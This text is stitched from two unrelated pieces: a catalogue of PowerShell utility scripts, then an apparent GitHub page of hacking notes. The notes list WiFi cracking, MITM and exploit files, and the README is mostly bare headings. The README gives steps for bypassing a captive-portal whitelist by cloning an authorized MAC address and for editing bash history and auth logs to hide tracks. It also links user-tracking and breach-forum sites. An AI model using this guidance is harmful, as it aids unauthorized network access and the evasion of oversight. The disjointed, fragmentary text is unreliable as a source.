of the given file. Read more... get-sha256.ps1 Prints the SHA256 checksum of the given file. Read more... inspect-exe.ps1 Prints basic information of the given executable file. Read more... list-dir-tree.ps1 Lists the directory tree content. Read more... list-empty-dirs.ps1 Lists empty subfolders within the given directory tree. Read more... list-empty-files.ps1 Lists empty files within the given directory tree. Read more... list-files.ps1 Lists all files in the given folder and also in every subfolder. Read more... list-folder.ps1 Lists the folder content. Read more... list-hidden-files.ps1 Lists hidden files within the given directory tree. Read more... list-recycle-bin.ps1 Lists the content of the recycle bin folder. Read more... list-unused-files.ps1 Lists unused files in a directory tree. Read more... list-workdir.ps1 Lists the current working directory. Read more... make-install.ps1 Installs built executables and libs to the installation directory. Read more... new-shortcut.ps1 Creates a new shortcut file. Read more... new-symlink.ps1 Creates a new symbolic link file. Read more... new-zipfile.ps1 Creates a new .zip file from a directory. Read more... publish-to-ipfs.ps1 Publishes the given files or directory to IPFS. Read more... remove-empty-dirs.ps1 Removes empty subfolders within the given directory tree. Read more... replace-in-files.ps1 Search and replace a pattern in the given files by the replacement. Read more... search-filename.ps1 Searches the directory tree for filenames by given pattern. Read more... search-files.ps1 Searches the given pattern in the given files. Read more... upload-file.ps1 Uploads the local file to the given FTP server. Read more... ♻️ Scripts to Convert Files Script Description convert-csv2txt.ps1 Converts a .CSV file to a text file. Read more » convert-mysql2csv.ps1 Converts a MySQL database table to a .CSV file. More » convert-ps2bat.ps1 Converts a PowerShell script to a Batch script. More » convert-ps2md.ps1 Converts the comment-based help of a PowerShell script to Markdown. More » convert-sql2csv.ps1 Converts a SQL database table to a .CSV file. More » convert-txt2wav.ps1 Converts text to a .WAV audio file. More » export-to-manuals.ps1 Exports all scripts as manuals. More » 📝 Scripts for Git Script Description build-repo.ps1 Builds a Git repository. Read more » build-repos.ps1 Builds all Git repositories in a folder. More » check-repo.ps1 Checks a Git repository. More » clean-repo.ps1 Cleans a Git repository from untracked files. More » clean-repos.ps1 Cleans all Git repositories in a folder from untracked files. More » clone-repos.ps1 Clones well-known Git repositories. More » configure-git.ps1 Sets up the Git user configuration. More » fetch-repo.ps1 Fetches updates for a Git repository. More » fetch-repos.ps1 Fetches updates for all Git repositories in a folder. More » list-branches.ps1 Lists all branches in a Git repository. More » list-commit-stats.ps1 Lists a Git commit statistics. More » list-commits.ps1 Lists all commits in a Git repository. More » list-latest-tag.ps1 Lists the latest tag on the current branch in a Git repository. More » list-latest-tags.ps1 Lists the latests tags in all Git repositories under a directory. More » list-repos.ps1 Lists all Git repositories in a folder. More » list-submodules.ps1 Lists all submodules in a Git repository. More » list-tags.ps1 Lists all tags in a Git repository. More » new-branch.ps1 Creates a new branch in a Git repository. More » new-tag.ps1 Creates a new tag in a Git repository. More » pick-commit.ps1 Cherry-picks a Git commit into multiple branches. More » pull-repo.ps1 Pulls updates into a Git repository. More » pull-repos.ps1 Pulls updates into all Git repositories in a folder. More » remove-tag.ps1 Removes a tag in a Git repository. More » switch-branch.ps1 Switches the branch in a Git repository. More » sync-repo.ps1 Synchronizes a Git repository by pull & push. More » write-changelog.ps1 Writes a changelog from Git commits. More » 🔎 Scripts for PowerShell Script Description daily-tasks.sh Execute PowerShell scripts automatically as daily tasks (Linux only). Read more » introduce-powershell.ps1 Introduces PowerShell to new users. More » list-aliases.ps1 Lists all PowerShell aliases. More » list-automatic-variables.ps1 Lists the automatic variables of PowerShell. More » list-cheat-sheet.ps1 Lists the PowerShell cheat sheet. More » list-cmdlets.ps1 Lists the PowerShell cmdlets. More » list-console-colors.ps1 Lists all console colors. More » list-modules.ps1 Lists the PowerShell modules. More » list-profiles.ps1 Lists your PowerShell profiles. More » list-scripts.ps1 Lists all PowerShell scripts in this repository. More » new-script.ps1 Creates a new PowerShell script. More » set-profile.ps1 Updates your PowerShell user profile. More » 🛒 Various PowerShell Scripts Script Description add-memo.ps1 Adds the given memo text to $HOME/Memos.csv. Read more » check-ipv4-address.ps1 Checks the given IPv4 address for validity. More » check-ipv6-address.ps1 Checks the given IPv6 address for validity. More » check-mac-address.ps1 Checks the given MAC address for validity. More » check-subnet-mask.ps1 Checks the given subnet mask for validity. More » check-weather.ps1 Checks the current weather for critical values. More » display-time.ps1 Displays the current time for 10 seconds by default. Read more... list-anagrams.ps1 Lists all anagrams of the given word. Read more... list-city-weather.ps1 Lists the current weather of cities worldwide (west to east). Read more... list-countries.ps1 Lists details of all countries. Read more... list-credits.ps1 Shows the credits. Read more... list-crypto-rates.ps1 Lists the current crypto exchange rates. Read more... list-environment-variables.ps1 Lists all environment variables. Read more... list-emojis.ps1 Lists the emojis of Unicode 13.0. Read more... list-fritzbox-calls.ps1 Lists the FRITZ!Box calls. Read more... list-fritzbox-devices.ps1 Lists FRITZ!Box's known devices. Read more... list-earthquakes.ps1 Lists earthquakes with magnitude >= 6.0 for the last 30 days. Read more... list-exchange-rates.ps1 Lists the current exchange rates for the given currency. Read more... list-memos.ps1 Lists the memos at $HOME/Memos.csv. Read more... list-mysql-tables.ps1 Lists the MySQL server tables. Read more... list-news.ps1 Lists the latest news. Read more... list-os-releases.ps1 Lists operating system releases and download URL. Read more... list-os-updates.ps1 Lists operating system updates. Read more... list-passwords.ps1 Prints a list of random passwords. Read more... list-pins.ps1 Prints a list of random PIN's. Read more... list-sql-tables.ps1 Lists the SQL server tables. Read more... list-tiobe-index.ps1 Lists the TIOBE index of top programming languages. Read more... list-weather.ps1 Lists the hourly weather. Read more... locate-city.ps1 Prints the geographic location of the given city. Read more... locate-ipaddress.ps1 Prints the geographic location of the given IP address. Read more... locate-zip-code.ps1 Prints the geographic location of the given zip-code. Read more... moon.ps1 Prints the current moon phase. Read more... new-qrcode.ps1 Generates a new QR code image file. Read more... reboot-fritzbox.ps1 Reboots the FRITZ!box device. Read more... scan-ports.ps1 Scans the network for open/closed ports. Read more... send-email.ps1 Sends an email message. Read more... send-tcp.ps1 Sends a TCP message to the given IP address and port. Read more... send-udp.ps1 Sends a UDP datagram message to the given IP address and port. Read more... set-timer.ps1 Sets a timer for a countdown. Read more... simulate-presence.ps1 Simulates the human presence against burglars. Read more... start-calibre-server.ps1 Starts a local Calibre server. Read more... start-ipfs-server.ps1 Starts a local IPFS server. Read more... switch-shelly1.ps1 Switches a Shelly1 device in the local network. Read more... translate-file.ps1 Translates the given text file into other languages. Read more... translate-files.ps1 Translates the given text files into any supported language. Read more... translate-text.ps1 Translates the given text in English into other languages. Read more... weather.ps1 Prints the current weather forecast. Read more... weather-report.ps1 Prints the local weather report. Read more... what-is.ps1 Prints a description of the given abbreviation. Read more... write-animated.ps1 Writes animated text. Read more... write-big.ps1 Writes the given text in big letters. Read more... write-blue.ps1 Writes the given text in a blue foreground color. Read more... write-braille.ps1 Writes the given text in Braille. Read more... write-calendar.ps1 Writes the calendar (month of year). Read more... write-green.ps1 Writes the given text in a green foreground color. Read more... write-joke.ps1 Writes a random Juck Norris joke. Read more... write-lowercase.ps1 Writes the given text in lowercase letters. Read more... write-marquee.ps1 Writes the given text as marquee. Read more... write-morse-code.ps1 Writes the given text in Morse code. Read more... write-motd.ps1 Writes the message of the day (MOTD). Read more... write-quote.ps1 Writes a random quote. Read more... write-red.ps1 Writes the given text in a red foreground color. Read more... write-rot13.ps1 Encodes or decodes the given text with ROT13. Read more... write-typewriter.ps1 Writes the given text with the typewriter effect. More » write-uppercase.ps1 Writes the given text in uppercase letters. More » write-vertical.ps1 Writes the given text in vertical direction. More » show-notification-motivation-quote.ps1 Show notification with random cat picture and motivation quote. More »p

Name		Name	Last commit message	Last commit date
Latest commit History 122 Commits
Bash Scripting		Bash Scripting
Firewall		Firewall
Hacking/CCTV Camera		Hacking/CCTV Camera
Internet		Internet
Linux		Linux
Protocol		Protocol
Regex		Regex
SSH		SSH
Technical Terms		Technical Terms
00__DAY__01		00__DAY__01
APITESTINGchecklist.png		APITESTINGchecklist.png
ATTACK MODE b Beacon Flooding.txt		ATTACK MODE b Beacon Flooding.txt
Active Directory PenTest Tools.png		Active Directory PenTest Tools.png
Adversary Emulation Campaign Hint.pdf		Adversary Emulation Campaign Hint.pdf
BASIC SCADA SHODAN DORK.pdf		BASIC SCADA SHODAN DORK.pdf
BRUTEFORCE_BYPASS_INFO.txt		BRUTEFORCE_BYPASS_INFO.txt
Binary exploitation checklist.png		Binary exploitation checklist.png
Blockchain and Smart Contract Testing Security.pdf		Blockchain and Smart Contract Testing Security.pdf
CRSF_RESET_EMAIL_EXPLOIT.txt		CRSF_RESET_EMAIL_EXPLOIT.txt
Commands.md		Commands.md
DAY_1		DAY_1
DEAUTH_WPA_CRACK.txt		DEAUTH_WPA_CRACK.txt
DOWNLOAD_ALL_DIR_FILES.txt		DOWNLOAD_ALL_DIR_FILES.txt
Data Loss Prevention Evasion Techniques.jpg		Data Loss Prevention Evasion Techniques.jpg
EDR TESTING.png		EDR TESTING.png
ENUMERATING_website_DIRS.txt		ENUMERATING_website_DIRS.txt
FAKE_WIFI_GEN.txt		FAKE_WIFI_GEN.txt
FIREWALL TESTING CHECKLIST.png		FIREWALL TESTING CHECKLIST.png
GUI_PORTSCANNER_ZENMAP.txt		GUI_PORTSCANNER_ZENMAP.txt
INSECURE DESERIALIZATION CHECKLIST.png		INSECURE DESERIALIZATION CHECKLIST.png
JWTTOKEN.png		JWTTOKEN.png
MAC_ADDRESS_CHANGEER.txt		MAC_ADDRESS_CHANGEER.txt
METASPLOIT_USAGE.txt		METASPLOIT_USAGE.txt
MITM+REDIRECT_ETTERCAP+WIFI_.txt		MITM+REDIRECT_ETTERCAP+WIFI_.txt
MITM_IMCP.txt		MITM_IMCP.txt
Memory Corruption Checklist.png		Memory Corruption Checklist.png
OSINTTOOLS.png		OSINTTOOLS.png
OSNIT_PHONENUMBER_INFO.txt		OSNIT_PHONENUMBER_INFO.txt
OT PENTEST CHECKLIST.png		OT PENTEST CHECKLIST.png
Offensive Security AWS Tools.png		Offensive Security AWS Tools.png
README.md		README.md
README_BACKUP.md		README_BACKUP.md
ROUTERSPLOIT_IOT.txt		ROUTERSPLOIT_IOT.txt
Readme.md		Readme.md
SCADA SHODAN DORK.png		SCADA SHODAN DORK.png
SERVER_BUILD.md		SERVER_BUILD.md
SERVER_BUILD.txt		SERVER_BUILD.txt
SQL_INFO.txt		SQL_INFO.txt
SSO Security Testing Checklist.png		SSO Security Testing Checklist.png
Threat Intelligence Tools #1.png		Threat Intelligence Tools #1.png
VM_Bridging_Network.txt		VM_Bridging_Network.txt
WEBSITE_OSINT_NG-RECON.txt		WEBSITE_OSINT_NG-RECON.txt
WIFI-DISCOVER_SERVERS.txt		WIFI-DISCOVER_SERVERS.txt
WIFI_AUTO_WPA-WPS_KEYGEN.txt		WIFI_AUTO_WPA-WPS_KEYGEN.txt
WIFI_BEACON_FLOODING_.txt		WIFI_BEACON_FLOODING_.txt
WIFI_CRACKER.txt		WIFI_CRACKER.txt
WIFI_CRACKER_AIRATTACK.txt		WIFI_CRACKER_AIRATTACK.txt
WIFI_DDOS_AUTHENTICATION.txt		WIFI_DDOS_AUTHENTICATION.txt
WIFI_DEAUTH_WPA_CRACK.txt		WIFI_DEAUTH_WPA_CRACK.txt
WIFI_DOS_EVILTWIN_WPA-CRACK.md		WIFI_DOS_EVILTWIN_WPA-CRACK.md
WIFI_DOS_EVILTWIN_WPA-CRACK.txt		WIFI_DOS_EVILTWIN_WPA-CRACK.txt
WIFI_FAKE_AP_GEN.txt		WIFI_FAKE_AP_GEN.txt
WIFI_FIND_AP_WITH_CLIENTS_ATTACHED.txt		WIFI_FIND_AP_WITH_CLIENTS_ATTACHED.txt
WIFI_FIND_OPEN+BSSID+ESSID_AP.txt		WIFI_FIND_OPEN+BSSID+ESSID_AP.txt
WIFI_FIND_OPEN_AP.txt		WIFI_FIND_OPEN_AP.txt
WIFI_GENERALTOOL_WEBSPLOIT.txt		WIFI_GENERALTOOL_WEBSPLOIT.txt
WIFI_GET_LOCAL_SUBNETS.txt		WIFI_GET_LOCAL_SUBNETS.txt
WIFI_HARASSER_LITE_FRAMEWORK.txt		WIFI_HARASSER_LITE_FRAMEWORK.txt
WIFI_LOCAL_ATTACK.txt		WIFI_LOCAL_ATTACK.txt
WIFI_MITM+REDIRECT_ETTERCAP.txt		WIFI_MITM+REDIRECT_ETTERCAP.txt
WIFI_MITM_HTTPS_VIEW_TRAFFIC.md		WIFI_MITM_HTTPS_VIEW_TRAFFIC.md
WIFI_MITM_HTTPS_VIEW_TRAFFIC.txt		WIFI_MITM_HTTPS_VIEW_TRAFFIC.txt
WIFI_MITM_VIEW_ALL_WEBTRAFFIC.txt		WIFI_MITM_VIEW_ALL_WEBTRAFFIC.txt
WIFI_PROBE.txt		WIFI_PROBE.txt
WIFI_PSK+WIRESHARK_VIEW_LOCALTRAFFIC_CLEAR.txt		WIFI_PSK+WIRESHARK_VIEW_LOCALTRAFFIC_CLEAR.txt
WIFI_PUBLIC-WIFI_LOGIN.txt		WIFI_PUBLIC-WIFI_LOGIN.txt
WIFI_VIEW_TRAFFIC_MOBILEPHONE.txt		WIFI_VIEW_TRAFFIC_MOBILEPHONE.txt
WIRESHARK_CRACKING_TLS.txt		WIRESHARK_CRACKING_TLS.txt
Web PenTesting Checklist by Joas.pdf		Web PenTesting Checklist by Joas.pdf
WindowsAPI CheckList.png		WindowsAPI CheckList.png
ad security testing checklist.png		ad security testing checklist.png
authentication_hack.txt		authentication_hack.txt
bluetooth_config.sh		bluetooth_config.sh
broadcast_mode.sh		broadcast_mode.sh
commands.sh		commands.sh
createpng		createpng
credentials dump and password attack tools.png		credentials dump and password attack tools.png
dockersecurity.png		dockersecurity.png
function broadcastInfo.sh		function broadcastInfo.sh
hacking_tools_cheat_sheet_v2.0-0.png		hacking_tools_cheat_sheet_v2.0-0.png
hacking_tools_cheat_sheet_v2.0-1.png		hacking_tools_cheat_sheet_v2.0-1.png
hacking_tools_cheat_sheet_v2.0-2.png		hacking_tools_cheat_sheet_v2.0-2.png
hacking_tools_cheat_sheet_v2.0.pdf		hacking_tools_cheat_sheet_v2.0.pdf
hacking_tools_cheat_sheet_v2.0.png		hacking_tools_cheat_sheet_v2.0.png
mobile pentest tools.png		mobile pentest tools.png
monitorWIFI.sh		monitorWIFI.sh
transfer2FS.sh		transfer2FS.sh
virtuaization_fix.sh		virtuaization_fix.sh

elithaxxor/GUIDES

Folders and files

Latest commit

History

Repository files navigation

GUIDES

IFRENAME

NMCLI

capture handshake [WAIT FOR MESSAGES TO UPDATE]

FINALY- CRACK THE PASSWORD

tcpdump [options] [filters]

TO FIND WEP PROTECTION

lookoups#### 2 ⚙

host, nslookup, dig

webserversudo iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort

mail server

FOR BROWSER PLUGINS (OSNIT, SELF SECURITY)

https://inteltechniques.com/

## throw-away email

tempmailer.de

grabify.link ## --> track usersr

shodan.io ## --> device info

https://nvd.nist.gov/developers/vulnerabilities

https://www.exploit-db.com/

securityfocus.com

https://sur.ly/i/breachforums.com/

namecheckup.com ## --> osnit

https://neatnik.net/steganographr/ --> stenography (*to hide tracks)

NMAP SCRIPT LOCATION

Social media accounts#####

DEEP OSNIT ### THE HARVESTER

Osintgram -- INSTAGRAM OSNIT

echo the ig dummy user account and set to .conf file (#3)

need to create username.conf, pw.conf and settings.json

DEEP OSNIT ### THE HARVESTER

TWINT --- TWITTER OSNIT

https://null-byte.wonderhowto.com/how-to/mine-twitter-for-targeted-information-with-twint-0193853/

[MAN] https://github.com/twintproject/twint

USER RECON --> ACTIVE SOCIAL MEDIA PAGES

TO LOOK UP BREACHED PASSWORDS AND USER INFO

TO RETURN DOMAIN EMAILS

--------------- [NMAP - Probing Intensty ] sV --version-light (Enable light mode) sV --version-all (Try every single probe) sV --version-trace (Trace version scan activity)

nmap to find who's on Lan (subnet)

nmap to find who's on Lan (subnet)

php vulnerability

BRUTE FORCE

BRUTESPRAY --> requries nmap fiel

php vulnerability

CANARY TOKENS

LOGS

BASH HISTORY

or edit the var $HISTSIZE and $HISTFILESIZE

AUTH-LOG FILES

To add new user

basics

NOISY--> diguise packets hidden behind prexisting servers (by generaitng random traffic)#

--> best if used if you think someone is spying on you or the network

ADD SITES TO CONFIG FILE sudo apt install ./discord.deb

MAC ADDRESS RANDOMIZATION ( CELL PHONES )

conecting to portals --> swap mac address on whitelist with an already authorized Mac address

1. put card into wiresless monitor mode

2. find exisitng users on the whitelist. find the channel of ESSID

3. copy the mac connected to router.

EDIT CONFIG /ETC/PROXYCHAINS.CONF

NMAP SCRIPT LOCATION

CANARY TOKENS

LOGS

BASH HISTORY

or edit the var $HISTSIZE and $HISTFILESIZE

AUTH-LOG FILES

MANGLE TTL

WINDOWS

LINUX (default ttl=64)

make abunch of differnt APS

use private key to sign secret.enc.

Public key

verification file

making signed encryption

to sign

OSNIT / SPY BLUETOOTH